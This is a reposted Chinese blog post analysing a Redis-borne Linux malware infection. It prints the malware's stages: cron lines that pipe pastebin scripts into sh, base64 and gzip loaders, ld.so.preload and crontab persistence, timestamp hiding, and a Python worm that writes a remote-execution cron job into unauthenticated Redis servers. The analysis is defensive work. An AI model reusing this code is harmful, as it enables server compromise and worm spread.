碼上歡樂
相關內容    簡體    繁體

記一次redis病毒分析筆記

本文轉載自   查看原文   2018-09-05 15:13   944    Linux/ redis bash linux

起因

偶然間發現redis里有一個陌生key:tightsoft,它的值是:*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh
看key名就知道這肯定不是我們存的,再看value我警覺了,這是要定時執行腳本啊。

分析

於是我便開始逐層撥開它的面紗,腳本的內容是來源於https://pastebin.com/raw/xbY7p5Tb,把它下載到本地后查看是這樣的:
/usr/bin/curl -fsSL https://pastebin.com/raw/XqwCz5rc|base64 -d > /bin/ntpder && chmod 755 /bin/ntpder && /bin/ntpder && rm -rf /bin/ntpder

又是一層遠程下載並執行腳本,不過這次是加密的,腳本的意思是從https://pastebin.com/raw/XqwCz5rc下載base64編碼后的腳本然后再還原,再寫入到/bin/ntpder並執行,最后刪除掉/bin/ntpder。
https://pastebin.com/raw/XqwCz5rc還原后的代碼片段是這樣的:

#!/bin/sh
skip=44

tab='   '
nl='
'
IFS=" $tab$nl"

umask=`umask`
umask 77

gztmpdir=
trap 'res=$?
  test -n "$gztmpdir" && rm -fr "$gztmpdir"
  (exit $res); exit $res
' 0 1 2 3 5 10 13 15

if type mktemp >/dev/null 2>&1; then
  gztmpdir=`mktemp -dt`
else
  gztmpdir=/tmp/gztmp$$; mkdir $gztmpdir
fi || { (exit 127); exit 127; }

gztmp=$gztmpdir/$0
case $0 in
-* | */*'
') mkdir -p "$gztmp" && rm -r "$gztmp";;
*/*) gztmp=$gztmpdir/`basename "$0"`;;
esac || { (exit 127); exit 127; }

case `echo X | tail -n +1 2>/dev/null` in
X) tail_n=-n;;
*) tail_n=;;
esac
if tail $tail_n +$skip <"$0" | gzip -cd > "$gztmp"; then
  umask $umask
  chmod 700 "$gztmp"
  (sleep 5; rm -fr "$gztmpdir") 2>/dev/null &
  "$gztmp" ${1+"$@"}; res=$?
else
  echo >&2 "Cannot decompress $0"
  (exit 127); res=127
fi; exit $res
從這里開始是二進制的gzip打包后的數據

腳本的大概意思是將它后面附加的gzip解壓得到另一個腳本文件並執行,解壓后的代碼片段為:

#!/bin/bash
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

function kills() {
rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json
netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill 
此處省略若干行...,用於清理之前的進程及文件
}

//保障被殺后還能再次執行
function system() {
        if [ ! -f "/bin/httpdns" ]; then
                curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
                if [ ! -f "/bin/httpdns" ]; then
                        wget  https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
                fi
                if [ ! -f "/etc/crontab" ]; then
                        echo -e "0 2 * * * root /bin/httpdns" >> /etc/crontab
                else
                        sed -i '$d' /etc/crontab && echo -e "0 2 * * * root /bin/httpdns" >> /etc/crontab
                fi
        fi
}

//這是病毒的核心代碼,下載的是一個二進制的可執行文件,里面干了什么就得得而知了
function top() {
        if [ ! -f "/usr/local/lib/libntp.so" ]; then
                curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
                if [ ! -f "/usr/local/lib/libntp.so" ]; then
                        wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
                fi
        fi
        if [ ! -f "/etc/ld.so.preload" ]; then
                echo /usr/local/lib/libntp.so > /etc/ld.so.preload
        else
                sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload
        fi
        touch -acmr /bin/sh /etc/ld.so.preload
        touch -acmr /bin/sh /usr/local/lib/libjdk.so
        touch -acmr /bin/sh /usr/local/lib/libntp.so
}

//這是用python寫的一段腳本,用於傳播到其它機器
function python() {
        nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
        touch /tmp/.tmp
}

此處省略若干行...
后面還有下載運行、版本更新等功能,就不一一展開了

重點說一下redis傳播這塊,希望大家能提高警戒,上面python那一段也是先base64解碼后再執行,也是二層下載,中間層就不說了,最終展開后的代碼是這樣的:

#! /usr/bin/env python
#coding: utf-8

import threading
import socket
from re import findall
import httplib

IP_LIST = []

class scanner(threading.Thread):
    tlist = []
    maxthreads = 100
    evnt = threading.Event()
    lck = threading.Lock()

    def __init__(self,host):
        threading.Thread.__init__(self)
        self.host = host
    def run(self):
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((self.host, 6379))
            s.send('set tightsoft "\\n\\n\\n*/1 * * * * root curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\\n\\n\\n"\r\n')
            s.send('config set dir /etc/cron.d\r\n')
            s.send('config set dbfilename root\r\n')
            s.send('save\r\n')
            s.close()
        except Exception:
            pass
 此處省略若干行...

它嘗試連接沒有設置密碼的redis服務器,並寫入一個key tightsoft, 至此就找到了這個key產生的原因,至少咋來的,可能是通過其它機器感染的就不知而知了。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 記一次MBR鎖機病毒分析 一次病毒分析之旅 記一次Linux服務器因redis漏洞的挖礦病毒入侵 記一次利用redis橫向移動挖礦分析 記一次部署Hadoop后遭受kthreaddi挖礦病毒 記一次親身體驗的勒索病毒事件 StopV2勒索病毒 記錄一次清理Redis 病毒程序 kdevtmpfsi 記一次Redis錯誤排查經歷 記一次redis主從同步失敗 記一次Redis和NetMQ的測試
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM